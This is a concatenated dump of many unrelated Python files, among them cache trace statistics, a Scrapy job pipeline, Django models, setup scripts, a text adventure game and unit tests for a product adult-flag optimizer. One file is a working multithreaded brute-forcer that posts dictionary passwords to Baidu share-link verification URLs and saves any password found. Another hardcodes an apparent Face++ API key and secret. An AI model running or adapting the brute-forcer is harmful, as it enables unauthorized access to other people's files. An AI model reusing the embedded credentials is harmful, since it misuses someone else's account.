p_range=(0,1), s_range=(0,1)): filtered = DoCTable.filter_ref({"time_DoC": t_range, "u_agent_DoC": u_range, "page_DoC": p_range, "status_DoC": s_range }) ip_List = [d["ip"].value for d in filtered] return DataSet.filter_ref(ip=ip_List), ip_List def getFeatureVectors(DataSet, indexMap): DoCT = getDoCTable(DataSet, indexMap) ipFT = ip_freq.getTable(DataSet) pageFT = query_markov.getTable(DataSet) Merged = data.Table([DoCT, ipFT, pageFT]) return Merged def extract_feature(data_path, save_path): DataSet = data.Table(data_path) rData = rd.remove_tiny(DataSet) indexMap = rd.getindexMap(rData) Feat_Table = getFeatureVectors(rData, indexMap) Feat_Table.save(save_path) def main(): data_path = raw_input("path > ") save_path = raw_input("save path > ") extract_feature(data_path,save_path) #DoCT = getFeatureVectors(Data) #Save_path = raw_input("save path > ") if __name__ == '__main__': main()
# coding=utf-8 """ this module calculates the stat of the trace """ from pprint import pformat from collections import defaultdict class TraceStat: """ this class provides statistics calculation of a given trace """ def __init__(self, reader, top_N_popular=8): self.reader = reader self.top_N_popular = top_N_popular # stat data representation: # 0: not initialized, # -1: error while obtaining data self.num_of_requests = 0 self.num_of_uniq_obj = 0 self.cold_miss_ratio = 0 self.top_N_popular_obj = [] self.num_one_hit_wonders = 0 self.freq_mean = 0 self.time_span = 0 self.ttl_dict = defaultdict(int) self.top_ttl_dict = {} self.key_size_mean_weighted_by_req = 0 self.value_size_mean_weighted_by_req = 0 self.obj_size_mean_weighted_by_req = 0 self.req_size_mean_weighted_by_req = 0 self.key_size_mean_weighted_by_obj = 0 self.value_size_mean_weighted_by_obj = 0 self.obj_size_mean_weighted_by_obj = 0 self.req_size_mean_weighted_by_obj = 0 self.op_ratio = defaultdict(int) self._calculate() def _calculate(self): """ calculate all the stat using the reader :return: """ req_cnt = defaultdict(int) sum_key_size_req, sum_value_size_req, sum_obj_size_req, sum_req_size_req = 0, 0, 0, 0 sum_key_size_obj, sum_value_size_obj, sum_obj_size_obj, sum_req_size_obj = 0, 0, 0, 0 first_req = next(self.reader) n_nonzero_sz_obj = 0 for req in self.reader: if req.req_size > 0: sum_key_size_req += req.key_size * req.cnt sum_value_size_req += req.value_size * req.cnt sum_obj_size_req += req.obj_size * req.cnt sum_req_size_req += req.req_size * req.cnt if req.obj_id not in req_cnt: sum_key_size_obj += req.key_size sum_value_size_obj += req.value_size sum_obj_size_obj += req.obj_size sum_req_size_obj += req.req_size n_nonzero_sz_obj += 1 if req.op: self.op_ratio[req.op] += 1 if req.op in ("set", "add", "set", "add", "cas", "replace", "append", "prepend"): ttl = req.ttl # round up if abs(ttl//10*10 - ttl) <= 2: ttl = ttl // 10 * 10 if ttl < 3600: ttl = "{}s".format(ttl) elif 24*3600 > ttl >= 3600: ttl = "{:.1f}h".format(ttl/3600) elif ttl >= 24*3600: ttl = "{:.1f}d".format(ttl/3600/24) ttl = ttl.replace(".0", "") self.ttl_dict[ttl] += 1 req_cnt[req.obj_id] += req.cnt last_req = req self.reader.reset() self.num_of_uniq_obj = len(req_cnt) self.num_of_requests = sum(req_cnt.values()) self.cold_miss_ratio = self.num_of_uniq_obj / self.num_of_requests self.time_span = last_req.real_time - first_req.real_time if n_nonzero_sz_obj == 0: print("all requests size 0") else: self.key_size_mean_weighted_by_req = sum_key_size_req/self.num_of_requests self.value_size_mean_weighted_by_req = sum_value_size_req/self.num_of_requests self.obj_size_mean_weighted_by_req = sum_obj_size_req/self.num_of_requests self.req_size_mean_weighted_by_req = sum_req_size_req/self.num_of_requests self.key_size_mean_weighted_by_obj = sum_key_size_obj/n_nonzero_sz_obj self.value_size_mean_weighted_by_obj = sum_value_size_obj/n_nonzero_sz_obj self.obj_size_mean_weighted_by_obj = sum_obj_size_obj/n_nonzero_sz_obj self.req_size_mean_weighted_by_obj = sum_req_size_obj/n_nonzero_sz_obj for op, cnt in self.op_ratio.items(): self.op_ratio[op] = cnt/self.num_of_requests # find the top ttl used in the workload total_ttl_cnt = sum(self.ttl_dict.values()) for ttl, cnt in sorted(self.ttl_dict.items(), key=lambda x:-x[1]): self.top_ttl_dict[ttl] = cnt/total_ttl_cnt if len(self.top_ttl_dict) >= 10: break # l is a list of (obj, freq) in descending order l = sorted(req_cnt.items(), key=lambda x: x[1], reverse=True) self.top_N_popular_obj = l[:self.top_N_popular] # count one-hit-wonders for i in range(len(l)-1, -1, -1): if l[i][1] == 1: self.num_one_hit_wonders += 1 else: break self.freq_mean = self.num_of_requests / (float) (self.num_of_uniq_obj) def _gen_stat_str(self): """ gegerate a stat str """ s = "dat: {}\nnumber of requests: {}\nnumber of uniq obj/blocks: {}\n" \ "cold miss ratio: {:.4f}\ntop N popular (obj, num of requests): \n{}\n" \ "number of obj/block accessed only once: {} ({:.4f})\n" \ "weighted_by_req: obj_size_mean {:.0f}, req_size_mean {:.0f}, key_size_mean {:.0f}, value_size_mean {:.0f}\n"\ "weighted_by_obj: obj_size_mean {:.0f}, req_size_mean {:.0f}, key_size_mean {:.0f}, value_size_mean {:.0f}\n"\ "frequency mean: {:.2f}\n".format(self.reader.trace_path, self.num_of_requests, self.num_of_uniq_obj, self.cold_miss_ratio, pformat(self.top_N_popular_obj), self.num_one_hit_wonders, self.num_one_hit_wonders/self.num_of_uniq_obj, self.obj_size_mean_weighted_by_req, self.req_size_mean_weighted_by_req, self.key_size_mean_weighted_by_req, self.value_size_mean_weighted_by_req, self.obj_size_mean_weighted_by_obj, self.req_size_mean_weighted_by_obj, self.key_size_mean_weighted_by_obj, self.value_size_mean_weighted_by_obj, self.freq_mean) if self.time_span: s += "time span: {} ({:.2f} day)\n".format(self.time_span, self.time_span/3600/24) if len(self.op_ratio): op_ratio_str = "op: " + ", ".join(["{}:{:.4f}".format(op, ratio) for op, ratio in self.op_ratio.items()]) s += op_ratio_str + "\n" # s += "op ratio: {}\n".format(pformat(self.op_ratio)) if len(self.top_ttl_dict): s += "ttl: {} ttls used, ".format(len(self.ttl_dict)) + ", ".join(["{}:{:.4f}".format(ttl, ratio) for ttl, ratio in self.top_ttl_dict.items() if ratio >= 0.01]) return s def _gen_stat_json(self): raise RuntimeError("not implemented") def get_stat(self, return_format="str"): """ return stat in the format of string or tuple :param return_format: :return: """ if return_format == "str": return self._gen_stat_str() elif return_format == "tuple": return (self.num_of_requests, self.num_of_uniq_obj, self.cold_miss_ratio, self.top_N_popular_obj, self.num_one_hit_wonders, self.freq_mean, self.time_span) elif return_format == "dict": d = self.__dict__.copy() elif return_format == "json": return self._gen_json() else: raise RuntimeError("unknown return format, return string instead") return s def get_top_N(self): return self.top_N_popular_obj def __repr__(self): return self.get_stat() def __str__(self): return self.get_stat()
# -*- coding: utf-8 -*- # Define your item pipelines here # # Don't forget to add your pipeline to the ITEM_PIPELINES setting # See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html import datetime import re from job51.items import Job51Item class Job51Pipeline(object): def process_item(self, item, spider): data = Job51Item(item) # 去除每个属性数据中的 \t字符,再用 \t字符作为分隔符 # 在hadoop中就以 \t为分隔符来切割记录 # 由于dict中各个字段的顺序不固定,所以采用这种方式 output_data = (data["category"] + "\t" + re.sub(r"\s+", " ", data["title"]).strip() + "\t" + data["salary"] + "\t" + data["place"] + "\t" + data["experience"] + "\t" + data["education"] + "\t" + data["need_persons"] + "\t" + data["publish_date"] + "\t" + data["url"] + "\t" + re.sub(r"\s+", " ", data["need_skill"]).strip()) + "\n" # 通过category属性,把记录写入相应的文件 now_day = str(datetime.datetime.now().date()) file_path = "D:/Code/GraduationProject/files/{0}_{1}_{2}.txt"\ .format(now_day, "51Job", data["category"]) with open(file_path, "a", encoding="utf-8") as f: f.write(output_data)
n=int(input()) fact=1 if n==0: print("factorial is 1") elif(n<0): print("not possible") else: for i in range(1,n+1): fact=fact*i print("factorial of ",n,"is",fact)
from django.contrib.auth.models import User from django.db import models class Task(models.Model): title = models.CharField(max_length=255, null=False, blank=False) description = models.TextField(null=False, blank=False) is_done = models.BooleanField(default=False) user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='user_tasks') created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) class Meta: unique_together = ('title', 'user') def __str__(self): return self.title
#!/usr/bin/python #coding=utf-8 def binary_search(f_n, f_l): """ :type f_n: int :type f_l: list :rtype int """ low = 0 high = len(f_l) while low <= high: mid = (low + high) / 2 if f_l[mid] == f_n: return mid elif f_l[mid] < f_n: low = mid + 1 else: high = mid - 1 return -1 if __name__ == '__main__': f_list = [1,2,3,7,8,9,10,5] f_list.sort() print("原有序列表为:{}".format(f_list)) try: f_num = int(input("请输入要查找的数:")) except: print("请输入正确的数!") exit() result = binary_search(f_num, f_list) if result != -1: print("要找的元素 {} 的序号为:{}".format(f_num, result)) else: print("未找到!")
# -*- coding: utf-8 -*- # ============================================================================= # Created on Sat Aug 3 13:00:11 2019 # # @author: Brénainn Woodsend # # # BaseFigure.py provides a base class for vpl figures. # Copyright (C) 2019 Brénainn Woodsend # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. # ============================================================================= from __future__ import print_function from builtins import super import numpy as np import sys import os from pathlib2 import Path from .render_window import VTKRenderer from .figure_manager import reset_camera, scf, gcf class BaseFigure(VTKRenderer): def __init__(self, name=""): super().__init__() scf(self) # Just for fun if name: self.window_name = name else: try: import namegenerator self.window_name = namegenerator.gen().replace("-", " ").title() except ImportError: self.window_name = "VTK figure" self.plots = set() _reset_camera = True def reset_camera(self): return reset_camera(self) def show(self, block=True): # Try and force the console to finish displaying any preceding print # statements before VTK start is called and blocks everything. Rather # limited success. try: # python 2 doesn't have flush print(end="", flush=True) except TypeError: pass sys.stdout.flush() for attr in ("buffer", "_buffer"): if hasattr(sys.stdout, attr): getattr(sys.stdout, attr).flush() self.start(block, self._reset_camera) # Camera only gets reset automatically the first time self.show() is # called. self._reset_camera = False if block and gcf() is self: scf(None) def add_plot(self, plot): if isinstance(plot, np.ndarray) and plot.dtype == object: [self.add_plot(i) for i in plot.flat] return if plot not in self.plots: self._add_actor(plot.actor) self.plots.add(plot) def remove_plot(self, plot): if isinstance(plot, np.ndarray) and plot.dtype == object: [self.remove_plot(i) for i in plot.flat] return if plot in self.plots: self._remove_actor(plot.actor) self.plots.remove(plot) def __iadd__(self, plot): self.add_plot(plot) return self def __isub__(self, plot): self.remove_plot(plot) return self @property def render_size(self): """Get the render image size (width, height) in pixels. Note that if the figure is a QtFigure then the setter will be constantly overridden by the parent widget's resizing.""" return self.renWin.GetSize() @render_size.setter def render_size(self, size): self.renWin.SetSize(*size) if __name__ == "__main__": pass
#! /usr/bin/env python # Public Domain (-) 2004-2011 The Assetgen Authors. # See the Assetgen UNLICENSE file for details. from setuptools import setup # ------------------------------------------------------------------------------ # Run Setup # ------------------------------------------------------------------------------ setup( name="assetgen", author="tav", author_email="tav@espians.com", classifiers=[ "Development Status :: 5 - Production/Stable", "Environment :: Web Environment", "Intended Audience :: Developers", "License :: Public Domain", "Operating System :: OS Independent", "Programming Language :: Python", "Topic :: Text Processing", "Topic :: Utilities" ], description="Asset generator for modern web app development", entry_points=dict(console_scripts=[ "assetgen = assetgen:main" ]), install_requires=[ "PyYAML>=3.09", "requests>=0.14.1", "simplejson>=2.1.6", "tavutil>=1.0" ], keywords=["assets", "javascript", "css", "coffeescript", "sass"], license="Public Domain", long_description=open('README.rst').read(), packages=["assetgen"], url="https://github.com/tav/assetgen", version="0.2.2", zip_safe=True )
# !/usr/bin/env python # -*- encoding: utf-8 -*- import Queue import sys import threading import time import optparse import requests from lib.consle_width import getTerminalSize class baiduBrute: def __init__(self, target, threads_num): self.target = target.replace("link", "verify").replace("init", "verify").strip() self.names_file = "./dic.txt" self.thread_count = self.threads_num = threads_num self.scan_count = self.found_count = 0 self.lock = threading.Lock() self.console_width = getTerminalSize()[0] self.console_width -= 2 # Cal width when starts up self._load_pass() # outfile = target + '.txt' if not output else output # self.outfile = open(outfile, 'w') # won't close manually self.headers = { "Content-Type": "application/x-www-form-urlencoded" } # 读入队列 def _load_pass(self): self.queue = Queue.Queue() with open(self.names_file) as f: for line in f: sub = line.strip() if sub: self.queue.put(sub) def _update_scan_count(self): self.lock.acquire() self.scan_count += 1 self.lock.release() def _print_progress(self): self.lock.acquire() msg = '%s found | %s remaining | %s scanned in %.2f seconds' % ( self.found_count, self.queue.qsize(), self.scan_count, time.time() - self.start_time) sys.stdout.write('\r' + ' ' * (self.console_width - len(msg)) + msg) sys.stdout.flush() self.lock.release() def _scan(self): while self.queue.qsize() > 0: payload = self.queue.get(timeout=1.0) try: res = requests.post(url=self.target, data="pwd=" + payload, headers=self.headers) answer = res.headers["set-cookie"] if answer: self.lock.acquire() if "BDCLND=" in answer: print "\nOK! password found: " + payload self.found_count += 1 f = open("./pass.txt", 'w') f.write(payload + '\n') f.close() # exit(1) else: pass self.lock.release() except: pass self._update_scan_count() self._print_progress() self._print_progress() self.lock.acquire() self.thread_count -= 1 self.lock.release() def run(self): self.start_time = time.time() for i in range(self.threads_num): t = threading.Thread(target=self._scan, name=str(i)) t.setDaemon(True) t.start() while self.thread_count > 0 and self.found_count == 0: time.sleep(0.01) if __name__ == '__main__': parser = optparse.OptionParser('usage: %prog [options] target') parser.add_option('-t', '--threads', dest='threads_num', default=10, type='int', help='Number of threads. default = 30') parser.add_option('-o', '--output', dest='output', default=None, type='string', help='Output file name. default is {target}.txt') (options, args) = parser.parse_args() if len(args) < 1: parser.print_help() sys.exit(0) d = baiduBrute(target=args[0], threads_num=options.threads_num, ) d.run()
#!/usr/bin/env python # coding: utf-8 # In[42]: def checksublist(lst,sublist): correct,incorrect=0,0 for i in sublist: if(all (x in sublist) for x in lst): correct+=1 else: incorrect+=1 if (correct>incorrect): print ("It's a Match") else: print ("It's Gone") sublist=[1,1,5] lst = [1,5,6,4,1,2,3,5] checksublist(lst,sublist) # In[40]: lst1=[1,5,6,5,1,2,3,6] # In[41]: checksublist(lst1,sublist) # In[ ]:
# SPDX-License-Identifier: Apache-2.0 """ keras2onnx This package converts keras models into ONNX for use with any inference engine supporting ONNX """ __version__ = "1.9.0" __author__ = "Microsoft Corporation" __producer__ = "keras2onnx" __producer_version__ = __version__ __domain__ = "onnxmltools" __model_version__ = 0 try: import sys import os.path from os.path import dirname, abspath import tensorflow from distutils.version import StrictVersion if StrictVersion(tensorflow.__version__.split('-')[0]) >= StrictVersion('2.0.0'): tensorflow.compat.v1.disable_tensor_equality() except ImportError: raise AssertionError('Please conda install / pip install tensorflow or tensorflow-gpu before the model conversion.') from .proto import save_model from .common import Variable, cvtfunc, set_logger_level from .funcbook import set_converter, set_converters from .main import convert_keras from .main import export_tf_frozen_graph from .main import build_io_names_tf2onnx def tfname_to_onnx(name): return Variable.tfname_to_onnx(name)
# -*- coding: utf-8 -*- """ Created on Thu Jun 29 00:19:15 2017 @author: l96 """ import pandas as pd import numpy as np import os import zipfile root_dir = r'tickerData' filename_pool = os.listdir(root_dir) def write_dict_to_hdf_and_zip(ticker_dict, hdf_filename, compress = True): # ticker_dict: key = ticker, value = DataFrame # Assume .h5 and .zip have same filename base with pd.HDFStore(hdf_filename, 'w') as f: for ticker_name, ticker_df in data_dict.items(): f[ticker_name] = ticker_df if compress: temp = list(os.path.splitext(hdf_filename)) zip_filename = temp[0] + r'.zip' with zipfile.ZipFile(zip_filename, 'w', compression = zipfile.ZIP_DEFLATED) as f: f.write(hdf_filename) def read_hdf_or_zip_to_dict(filename): # Output temp = os.path.splitext(filename) if temp[-1] == '.zip': with zipfile.ZipFile(filename, 'r') as z: with pd.HDFStore(z.namelist()[0], 'r') as hdf: returned = {} for key in hdf.keys(): # Because keys in .h5 starts with '/', need to remove it. returned[key[1:]] = hdf.get(key) else: with pd.HDFStore(filename, 'r') as hdf: returned = {} for key in hdf.keys(): # Because keys in .h5 starts with '/', need to remove it. returned[key[1:]] = hdf.get(key) return returned #%% Load data data_dict = {} for filename in filename_pool: dot_position = filename.find('.') ticker = filename[:dot_position] print(ticker) temp_df = pd.read_csv(os.path.join(root_dir, filename), parse_dates = ['DATE']) data_dict[ticker] = temp_df if False: write_dict_to_hdf_and_zip(data_dict, 'data.h5')
# -*- coding: utf-8 -*- """ Created on Mon Apr 15 11:01:47 2019 @author: Eduardo Berg """ import wfdb import numpy as np import pandas as pd import matplotlib.pyplot as plt import scipy.io import os import json import scipy.signal as sig import pywt import sklearn as sk from sklearn.ensemble import RandomForestClassifier from sklearn.model_selection import cross_validate from PIL import Image import h5py with h5py.File('X.hdf5', 'r') as hf1: X = hf1['X'][:] with h5py.File('Ybin.hdf5', 'r') as hf2: Y = hf2['Y'][:] model = RandomForestClassifier(class_weight="balanced") print("start training") scores = cross_validate(model, X, Y, cv=3, return_train_score=True) print(scores)
from setuptools import setup setup( name='bitmapper', version="0.4", py_modules=['bitmapper'], install_requires=['click', 'Pillow', 'qrcode'], entry_points=''' [console_scrips] bitmapper=bitmapper:convert ''' )
import unittest import main import pprint from datetime import datetime import csv class TestStringMethods(unittest.TestCase): def test_1_basic_case(self): result = main.analyze_taxable_sales('test/1.csv') self.assertEqual(len(result), 2) self.assertEqual(result[0]['gain'], 0) self.assertEqual(result[1]['gain'], 50.0) self.assertEqual(result[0], {'amount': 10.0, 'buy_price': 10.0, 'currency': 'LTC', 'buy_date': datetime(2017, 1, 1, 0, 0), 'sell_date': datetime(2017, 1, 3, 0, 0), 'gain': 0.0, 'sell_price': 10.0}) self.assertEqual(result[1], {'amount': 10.0, 'buy_price': 5.0, 'currency': 'LTC', 'buy_date': datetime(2017, 1, 2, 0, 0), 'sell_date': datetime(2017, 1, 3, 0, 0), 'gain': 50.0, 'sell_price': 10.0}) def test_2_two_entries(self): result = main.analyze_taxable_sales('test/2.csv') self.assertEqual(len(result), 3) self.assertEqual(result[0]['gain'], 100.00) self.assertEqual(result[0]['amount'], 10) self.assertEqual(result[0]['buy_price'], 10.0) self.assertEqual(result[0]['sell_price'], 20.0) self.assertEqual(result[1]['gain'], 75.00) self.assertEqual(result[2]['gain'], 125.00) def test_3_test_losses(self): result = main.analyze_taxable_sales('test/3.csv') self.assertEqual(len(result), 2) self.assertEqual(result[0]['gain'], -50.00) self.assertEqual(result[0]['amount'], 10) self.assertEqual(result[0]['buy_price'], 10.0) self.assertEqual(result[0]['sell_price'], 5.0) self.assertEqual(result[1]['gain'], 0.00) def test_4_other_currencies(self): result = main.analyze_taxable_sales('test/4.csv') self.assertEqual(len(result), 2) self.assertEqual(result[0]['gain'], 50.00) self.assertEqual(result[0]['amount'], 10) self.assertEqual(result[0]['buy_price'], 10.0) self.assertEqual(result[0]['sell_price'], 15.0) self.assertEqual(result[1]['gain'], 100.00) def test_5_basis(self): result = main.analyze_taxable_sales('test/4.csv') self.assertEqual(len(result), 2) self.assertEqual(result[0]['gain'], 50.00) self.assertEqual(result[0]['amount'], 10) self.assertEqual(result[0]['buy_price'], 10.0) self.assertEqual(result[0]['sell_price'], 15.0) self.assertEqual(result[1]['gain'], 100.00) def test_6(self): result = main.analyze_taxable_sales('test/6.csv') self.assertEqual(len(result), 2) self.assertEqual(result[0]['gain'], 0) self.assertEqual(result[1]['gain'], 50.0) if __name__ == '__main__': unittest.main()
import os from random import randint def branch1(): print('You are startled awake...',end='') input() print('You look around the room and see a door and a window.') print('Do you want to walk out through the (d)oor or\nclimb out of the (w)indow?') choice = input('Your choice:') if choice == 'd': print('You walk through the door and are greeted by adoring fans!') print('You must be a rock star or something...',end='') input() return True elif choice == 'w': print('You forgot you were on the 40th story of your hotel...') print('As you fall, you wonder if this is what it feels like to') print('be a sperm whale...',end='') input() return False elif choice == 'stop': print('You didn\'t say the magic word...',end='') input() return False elif choice == 'quit': print('Quitters never win and winners never quit!') input() return False else: print('Tired...Confused...you go back to sleep...',end='') input() False def branch2(): print('One of your fans comes up to you with their hand inside') print('their coat. It might be a gun or a knife!') print('Do you want to (p)unch the fan or (h)ug the fan?') choice = input('Your choice:') if choice == 'p': print('You take a wild swing at the fan, but instead of hitting') print('the fan, you hit the very large, burly, man next to them.') print("He doesn't look pleased...") input() return False elif choice == 'h': print('You open your arms wide to hug the fan. They suddenly pull') print('out a rubber chicken and offer it to you. That\'s strange...') input() return True else: print('By doing nothing, you have accepted your fate.') print('The adoring fan grips you in a massive bear hug.') print('As you drift out of consciousness, you wonder if') print('this could have been prevented in some way...') return False def branch3(): print('Before you get a chance to do anything, a security') print('guard rushes from out of nowhere and grabs the rubber') print('chicken out of the fan\'s hand. ') print('Do you want to (c)ommend the security guard, or') print('(s)cold the security guard?') choice = input('Your choice:') print() if choice == 'c': print('After telling the guard thank you and shaking her hand,') print('you are lauded in the press for being such a great and') print('down to earth celebrity. Everyone buys your next album') print('and you go down in history as the best rock star in the') print('history of mankind...') input() return True if choice == 's': print('After scolding the guard, security guards refuse to') print('work for you anymore. Without security, all of your') print('upcoming tour dates are cancelled. Without the world') print('tour, your album sales plummet and your fans all start') print('talking about you as a one-hit wonder.') print('You can\'t help but wonder if this could have been prevented') print('somehow...') input() return False else: print('Your security detail sees your inaction as non support.') print('They go on strike. Without security, all of your') print('upcoming tour dates are cancelled. Without the world') print('tour, your album sales plummet and your fans all start') print('talking about you as a one-hit wonder.') print('You can\'t help but wonder if this could have been prevented') print('somehow...') input() return False def branch4(): print('You need to withdraw some money from the ATM.') print('Due to your stardom, there is plenty of cash in your') print(' account, now if only you could remember your pin...') tries = 0 pin = str(randint(1000,9999)) while tries < 5: guess = input('Enter your 4 digit security pin ({} tries left):'.format(5 - tries)) if guess == pin: print('That was it! You withdraw $1,000,000 and head to the mall.') input() return True else: print('That didn\'t work...') tries += 1 print('You suddenly remember your PIN! It was {}',format(pin)) print('Unfortunately, you have locked yourself out of your account') print('for 24 hours. Unable to access your fortune,') print('you withdraw from society, wallow in self-pity,') print('and go to bed without eating dessert.') input() return False def end(): input('You are startled awake...') input('woah deja vu...') print('You were dreaming about something, but can\'t seem') print('to remember what. Oh well, you feel well rested') print('and ready to start your day. You have an audition') print('in an hour, you better hurry up!') def main(): while True: if os.name == 'nt': os.system('cls') else: os.system('clear') if not branch1(): continue print() if not branch2(): continue print() if not branch3(): continue print() if not branch4(): continue print() end() break if __name__ == '__main__': main()
from django.conf.urls import url from django.urls import path from .views import ClaimsView from .views import PostExample from .views import MessagesView from .views import AddMessageView from .views import AddChatSessionView from .views import ChatSessionView from .views import AddLikeView from django.conf.urls.static import static from django.conf import settings urlpatterns = [ path('claims/', ClaimsView.as_view(), name="claims-all"), path('addclaim/', PostExample.as_view(), name="claims-all"), path('messages/', MessagesView.as_view(), name="claims-all"), path('addmessage/', AddMessageView.as_view(), name="claims-all"), path('addsession/', AddChatSessionView.as_view(), name="claims-all"), path('chatsessions/', ChatSessionView.as_view(), name="claims-all"), path('addlike/', AddLikeView.as_view(), name="claims-all"), ]
#!/usr/bin/env python2 # -*- coding: utf-8 - # You need to register your App first, and enter you API key/secret. # 您需要先注册一个App,并将得到的API key和API secret写在这里。 API_KEY = 'adfcb141240655a7f1df49972c38ffe3' API_SECRET = 'jDfByUXW5cm2HH6_6pRooDQe37t63r4t' # Import system libraries and define helper functions # 导入系统库并定义辅助函数 import time import cv2 import cv2.cv as cv from pprint import pformat def print_result(hint, result): def encode(obj): if type(obj) is unicode: return obj.encode('utf-8') if type(obj) is dict: return {encode(k): encode(v) for (k, v) in obj.iteritems()} if type(obj) is list: return [encode(i) for i in obj] return obj print hint result = encode(result) print '\n'.join([' ' + i for i in pformat(result, width = 75).split('\n')]) # First import the API class from the SDK # 首先,导入SDK中的API类 from facepp import API from facepp import File def repeat(): x= cv2.imread('1.jpg') cv2.imshow('image',x) #x = cv2.resize(np.asarray(cv.GetMat(frame))[y:y+h,x:x+w],(282,282), interpolation=cv2.INTER_LINEAR) api = API(API_KEY, API_SECRET) #cv.NamedWindow("W1",cv.CV_WINDOW_NORMAL) #cv.ResizeWindow("W1", 600, 600) #cv2.destroyAllWindows() while True: cv2.namedWindow("the window") x= cv2.imread('1.jpg') cv2.imshow('image',x) k = cv2.waitKey(0) # result = api.recognition.recognize(img = File(r'findface.jpe'), group_name = 'test') # print_result('Recognize result:123123', result) # print '=' * 60 # print 'The person with highest confidence:', \ # result['face'][0]['candidate'][0]['person_name']
# coding=utf-8 # Copyright 2022 Google LLC. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Unit tests for adult_optimizer.py.""" from absl.testing import parameterized from unittest import mock from optimizers_builtin import adult_optimizer from test_data import requests_bodies from util import app_util @mock.patch( 'optimizers_builtin.adult_optimizer._GPC_STRING_TO_ID_MAPPING_CONFIG_FILE_NAME', 'gpc_string_to_id_mapping_{}_test') class AdultOptimizerTest(parameterized.TestCase): def setUp(self) -> None: super(AdultOptimizerTest, self).setUp() app_util.setup_test_app() self.optimizer = adult_optimizer.AdultOptimizer() @parameterized.named_parameters([{ 'testcase_name': 'Idol Category', 'is_adult': False, 'test_product_types': ['CD・DVD, Blu-ray', 'アイドル', 'その他'], }, { 'testcase_name': 'Alcohol Category', 'is_adult': False, 'test_product_types': [ 'ビール・洋酒', 'リキュール', 'ハーブ・スパイス・ティー系', 'その他' ], }]) def test_adult_optimizer_sets_adult_to_true_if_product_type_is_adult( self, is_adult, test_product_types): original_data = requests_bodies.build_request_body( properties_to_be_updated={ 'adult': is_adult, 'productTypes': test_product_types }) optimized_data, optimization_result = self.optimizer.process( original_data, 'test') product = optimized_data['entries'][0]['product'] self.assertEqual(True, product['adult']) self.assertEqual(1, optimization_result.num_of_products_optimized) @parameterized.named_parameters([{ 'testcase_name': 'Adult Not Set', 'test_product_types': ['CD・DVD, Blu-ray', 'アイドル', 'その他'], }]) def test_adult_optimizer_sets_adult_to_true_if_product_type_is_adult_and_adult_not_set( self, test_product_types): original_data = requests_bodies.build_request_body( properties_to_be_updated={'productTypes': test_product_types}) optimized_data, optimization_result = self.optimizer.process( original_data, 'test') product = optimized_data['entries'][0]['product'] self.assertEqual(True, product['adult']) self.assertEqual(1, optimization_result.num_of_products_optimized) @parameterized.named_parameters([{ 'testcase_name': 'Adult GPC', 'test_google_product_category': '成人向け', 'test_title': 'No suspicious tokens', }, { 'testcase_name': 'Another Adult GPC', 'test_google_product_category': '成人向け > アダルト > アダルト雑誌', 'test_title': 'No suspicious tokens', }]) def test_adult_optimizer_sets_adult_to_true_if_gpc_is_adult_and_tokens_are_wildcard( self, test_google_product_category, test_title): original_data = requests_bodies.build_request_body( properties_to_be_updated={ 'title': test_title, 'googleProductCategory': test_google_product_category }) optimized_data, optimization_result = self.optimizer.process( original_data, 'test') product = optimized_data['entries'][0]['product'] self.assertEqual(True, product['adult']) self.assertEqual(1, optimization_result.num_of_products_optimized) @parameterized.named_parameters([{ 'testcase_name': 'Adult GPC as ID', 'test_google_product_category': 772, 'test_title': 'No suspicious tokens', }, { 'testcase_name': 'Another Adult GPC as ID', 'test_google_product_category': 4060, 'test_title': 'No suspicious tokens', }]) def test_adult_optimizer_sets_adult_to_true_if_gpc_is_adult_as_an_id_number( self, test_google_product_category, test_title): original_data = requests_bodies.build_request_body( properties_to_be_updated={ 'title': test_title, 'googleProductCategory': test_google_product_category }) optimized_data, optimization_result = self.optimizer.process( original_data, 'ja') product = optimized_data['entries'][0]['product'] self.assertEqual(True, product.get('adult', '')) self.assertEqual(1, optimization_result.num_of_products_optimized) @parameterized.named_parameters([{ 'testcase_name': 'Idol in Title', 'test_google_product_category': 'メディア > DVD・ビデオ', 'test_title': 'アイドル DVD', }, { 'testcase_name': 'Gravure in Title', 'test_google_product_category': 'メディア > DVD・ビデオ', 'test_title': 'DVD グラビア', }]) def test_adult_optimizer_sets_adult_to_true_if_gpc_and_title_is_adult( self, test_google_product_category, test_title): original_data = requests_bodies.build_request_body( properties_to_be_updated={ 'title': test_title, 'googleProductCategory': test_google_product_category }) optimized_data, optimization_result = self.optimizer.process( original_data, 'test') product = optimized_data['entries'][0]['product'] self.assertEqual(True, product['adult']) self.assertEqual(1, optimization_result.num_of_products_optimized) @parameterized.named_parameters([{ 'testcase_name': 'Idol in Description', 'test_description': 'アイドル DVD', 'test_google_product_category': 'メディア > DVD・ビデオ', }, { 'testcase_name': 'Gravure in Description', 'test_description': 'DVD グラビア', 'test_google_product_category': 'メディア > DVD・ビデオ', }]) def test_adult_optimizer_sets_adult_to_true_if_gpc_and_description_is_adult( self, test_google_product_category, test_description): original_data = requests_bodies.build_request_body( properties_to_be_updated={ 'description': test_description, 'googleProductCategory': test_google_product_category }) optimized_data, optimization_result = self.optimizer.process( original_data, 'test') product = optimized_data['entries'][0]['product'] self.assertEqual(True, product['adult']) self.assertEqual(1, optimization_result.num_of_products_optimized) @parameterized.named_parameters([{ 'testcase_name': 'Game Category', 'is_adult': False, 'test_product_types': [ 'テレビゲーム', 'プレイステーション4', '周辺機器' ], }]) def test_adult_optimizer_does_nothing_if_category_is_not_adult( self, is_adult, test_product_types): original_data = requests_bodies.build_request_body( properties_to_be_updated={ 'adult': is_adult, 'productTypes': test_product_types }) optimized_data, optimization_result = self.optimizer.process( original_data, 'test') product = optimized_data['entries'][0]['product'] self.assertEqual(False, 